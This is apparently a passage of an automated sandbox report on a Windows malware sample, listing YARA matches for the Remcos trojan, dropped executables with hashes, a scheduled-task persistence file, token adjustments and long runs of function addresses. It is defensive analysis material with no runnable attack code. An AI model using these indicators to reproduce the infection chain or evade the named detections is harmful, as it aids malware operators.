Source: 0000000C.00000003.2419805478.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: remcos_a.exe PID: 7184, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: remcos.exe PID: 7280, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: remcos.exe PID: 7640, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: remcos.exe PID: 180, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

.NET source code contains very large strings

Source: buildd[1].exe.11.dr, oNAMlo.cs	Long String: Length: 11394
Source: buildd.exe.11.dr, oNAMlo.cs	Long String: Length: 11394

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: DocumentsFHIEBKKFHI.exe.0.dr	Static PE information: section name:
Source: DocumentsFHIEBKKFHI.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.9.dr	Static PE information: section name:
Source: skotes.exe.9.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .rsrc
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: c2a8de8bf3.exe.11.dr	Static PE information: section name:
Source: c2a8de8bf3.exe.11.dr	Static PE information: section name: .rsrc
Source: c2a8de8bf3.exe.11.dr	Static PE information: section name: .idata
Source: c2a8de8bf3.exe.11.dr	Static PE information: section name:
Source: 315ef68721.exe.11.dr	Static PE information: section name:
Source: 315ef68721.exe.11.dr	Static PE information: section name: .idata
Source: remcos_a[1].exe.11.dr	Static PE information: section name:
Source: remcos_a[1].exe.11.dr	Static PE information: section name: .idata
Source: remcos_a[1].exe.11.dr	Static PE information: section name:
Source: remcos_a.exe.11.dr	Static PE information: section name:
Source: remcos_a.exe.11.dr	Static PE information: section name: .idata
Source: remcos_a.exe.11.dr	Static PE information: section name:
Source: random[1].exe0.11.dr	Static PE information: section name:
Source: random[1].exe0.11.dr	Static PE information: section name: .idata
Source: ed55d3f620.exe.11.dr	Static PE information: section name:
Source: ed55d3f620.exe.11.dr	Static PE information: section name: .idata
Source: remcos.exe.12.dr	Static PE information: section name:
Source: remcos.exe.12.dr	Static PE information: section name: .idata
Source: remcos.exe.12.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7662C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,		0_2_6C7662C0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B3CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,		11_2_00B3CB97

Source: C:\Users\user\DocumentsFHIEBKKFHI.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EAC60	0_2_6C5EAC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BAC30	0_2_6C6BAC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A6C00	0_2_6C6A6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DECC0	0_2_6C5DECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63ECD0	0_2_6C63ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AED70	0_2_6C6AED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70AD50	0_2_6C70AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C768D20	0_2_6C768D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76CDC0	0_2_6C76CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E4DB0	0_2_6C5E4DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C676D90	0_2_6C676D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67EE70	0_2_6C67EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C0E20	0_2_6C6C0E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EAEC0	0_2_6C5EAEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C680EC0	0_2_6C680EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666E90	0_2_6C666E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2F70	0_2_6C6A2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64EF40	0_2_6C64EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E6F10	0_2_6C5E6F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C720F20	0_2_6C720F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BEFF0	0_2_6C6BEFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E0FE0	0_2_6C5E0FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C728FB0	0_2_6C728FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EEFB0	0_2_6C5EEFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B4840	0_2_6C6B4840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C630820	0_2_6C630820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66A820	0_2_6C66A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E68E0	0_2_6C6E68E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CC8C0	0_2_6C6CC8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C618960	0_2_6C618960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C636900	0_2_6C636900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FC9E0	0_2_6C6FC9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6149F0	0_2_6C6149F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6709A0	0_2_6C6709A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69A9A0	0_2_6C69A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A09B0	0_2_6C6A09B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65CA70	0_2_6C65CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C698A30	0_2_6C698A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68EA00	0_2_6C68EA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65EA80	0_2_6C65EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E6BE0	0_2_6C6E6BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CEBD0	0_2_6C6CEBD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C680BA0	0_2_6C680BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E8BAC	0_2_6C5E8BAC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F8460	0_2_6C5F8460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C644420	0_2_6C644420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66A430	0_2_6C66A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6264D0	0_2_6C6264D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67A4D0	0_2_6C67A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70A480	0_2_6C70A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C642560	0_2_6C642560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C680570	0_2_6C680570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C728550	0_2_6C728550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C638540	0_2_6C638540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E4540	0_2_6C6E4540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AA5E0	0_2_6C6AA5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66E5F0	0_2_6C66E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D45B0	0_2_6C5D45B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63C650	0_2_6C63C650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63E6E0	0_2_6C63E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67E6E0	0_2_6C67E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6046D0	0_2_6C6046D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C660700	0_2_6C660700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60A7D0	0_2_6C60A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62E070	0_2_6C62E070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AC000	0_2_6C6AC000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A8010	0_2_6C6A8010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D8090	0_2_6C5D8090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BC0B0	0_2_6C6BC0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F00B0	0_2_6C5F00B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C648140	0_2_6C648140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C656130	0_2_6C656130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C4130	0_2_6C6C4130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E01E0	0_2_6C5E01E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7361B0	0_2_6C7361B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C668260	0_2_6C668260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C678250	0_2_6C678250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B8220	0_2_6C6B8220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AA210	0_2_6C6AA210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7662C0	0_2_6C7662C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B22A0	0_2_6C6B22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AE2B0	0_2_6C6AE2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FA2B0	0_2_6C5FA2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C722370	0_2_6C722370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FC360	0_2_6C6FC360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C676370	0_2_6C676370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E8340	0_2_6C5E8340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E2370	0_2_6C5E2370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C652320	0_2_6C652320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6343E0	0_2_6C6343E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6123A0	0_2_6C6123A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63E3B0	0_2_6C63E3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E3C40	0_2_6C5E3C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C709C40	0_2_6C709C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F1C30	0_2_6C5F1C30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A1CE0	0_2_6C6A1CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71DCD0	0_2_6C71DCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67FC80	0_2_6C67FC80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C643D00	0_2_6C643D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B1DC0	0_2_6C6B1DC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D3D80	0_2_6C5D3D80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C729D90	0_2_6C729D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73BE70	0_2_6C73BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C765E60	0_2_6C765E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EDE10	0_2_6C6EDE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C603EC0	0_2_6C603EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C615F20	0_2_6C615F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C737F20	0_2_6C737F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E3F30	0_2_6C6E3F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D5F30	0_2_6C5D5F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68BFF0	0_2_6C68BFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FDFC0	0_2_6C6FDFC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C763FC0	0_2_6C763FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C601F90	0_2_6C601F90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B3840	0_2_6C6B3840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63D810	0_2_6C63D810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6138E0	0_2_6C6138E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73B8F0	0_2_6C73B8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BF8F0	0_2_6C6BF8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67F8C0	0_2_6C67F8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5ED8E0	0_2_6C5ED8E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65F960	0_2_6C65F960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69D960	0_2_6C69D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695920	0_2_6C695920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72F900	0_2_6C72F900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6459F0	0_2_6C6459F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6779F0	0_2_6C6779F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6799C0	0_2_6C6799C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6199D0	0_2_6C6199D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F1980	0_2_6C5F1980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B1990	0_2_6C6B1990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C769A50	0_2_6C769A50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DDA30	0_2_6C6DDA30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C61FA10	0_2_6C61FA10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C681A10	0_2_6C681A10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E1AE0	0_2_6C5E1AE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BDAB0	0_2_6C6BDAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BFB60	0_2_6C6BFB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62BB20	0_2_6C62BB20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FBBD4	0_2_6C5FBBD4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C627BF0	0_2_6C627BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C639BA0	0_2_6C639BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A9BB0	0_2_6C6A9BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D1B80	0_2_6C5D1B80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C5B90	0_2_6C6C5B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C9430	0_2_6C6C9430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66D410	0_2_6C66D410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E14E0	0_2_6C5E14E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7614A0	0_2_6C7614A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F5510	0_2_6C5F5510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72F510	0_2_6C72F510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C647500	0_2_6C647500
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6655F0	0_2_6C6655F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D75D0	0_2_6C6D75D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C619590	0_2_6C619590
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F9650	0_2_6C5F9650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C635640	0_2_6C635640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C609600	0_2_6C609600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C657610	0_2_6C657610
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6116A0	0_2_6C6116A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6496A0	0_2_6C6496A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CD740	0_2_6C6CD740
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C603720	0_2_6C603720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B9720	0_2_6C6B9720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64D710	0_2_6C64D710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7237C0	0_2_6C7237C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66B7A0	0_2_6C66B7A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DD050	0_2_6C5DD050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E9050	0_2_6C5E9050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68F050	0_2_6C68F050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62B020	0_2_6C62B020
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Code function: 9_2_008F78BB	9_2_008F78BB
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Code function: 9_2_008F7049	9_2_008F7049
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Code function: 9_2_008F8860	9_2_008F8860
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Code function: 9_2_008F31A8	9_2_008F31A8
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Code function: 9_2_008B4B30	9_2_008B4B30
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Code function: 9_2_008B4DE0	9_2_008B4DE0
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Code function: 9_2_008F2D10	9_2_008F2D10
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Code function: 9_2_008F779B	9_2_008F779B
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Code function: 9_2_008E7F36	9_2_008E7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00B678BB	10_2_00B678BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00B68860	10_2_00B68860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00B67049	10_2_00B67049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00B631A8	10_2_00B631A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00B24B30	10_2_00B24B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00B24DE0	10_2_00B24DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00B62D10	10_2_00B62D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00B6779B	10_2_00B6779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00B57F36	10_2_00B57F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B2E530	11_2_00B2E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B46192	11_2_00B46192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B68860	11_2_00B68860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B24B30	11_2_00B24B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B24DE0	11_2_00B24DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B62D10	11_2_00B62D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B40E13	11_2_00B40E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B67049	11_2_00B67049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B631A8	11_2_00B631A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B41602	11_2_00B41602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B6779B	11_2_00B6779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B678BB	11_2_00B678BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B43DF1	11_2_00B43DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B57F36	11_2_00B57F36

Source: Joe Sandbox View	Dropped File: C:\ProgramData\Remcos\remcos.exe 9D577624ACCA69F5B4097A6882E934B026A344757CF5CF31F3341E643ED2BA20
Source: Joe Sandbox View	Dropped File: C:\ProgramData\chrome.dll 81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4

Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe

Process token adjusted: Load Driver

Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe

Process token adjusted: Security

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C7609D0 appears 353 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C603620 appears 100 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C76D930 appears 71 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C719F30 appears 53 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C609B10 appears 110 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C63C5E0 appears 35 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C76DAE0 appears 89 times
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Code function: String function: 008C80C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00B380C0 appears 263 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00B3DF80 appears 63 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00B3D663 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00B3D942 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00B58E10 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00B3D64E appears 66 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00B37A00 appears 39 times

Source: file.exe, 00000000.00000002.2013402382.000000006F902000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000022.00000003.2918030164.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001B.00000003.2584176441.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000002.2922707020.0000000000401000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000C.00000002.2460202180.0000000000401000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000003.2453130282.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001B.00000002.2624639013.0000000000401000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
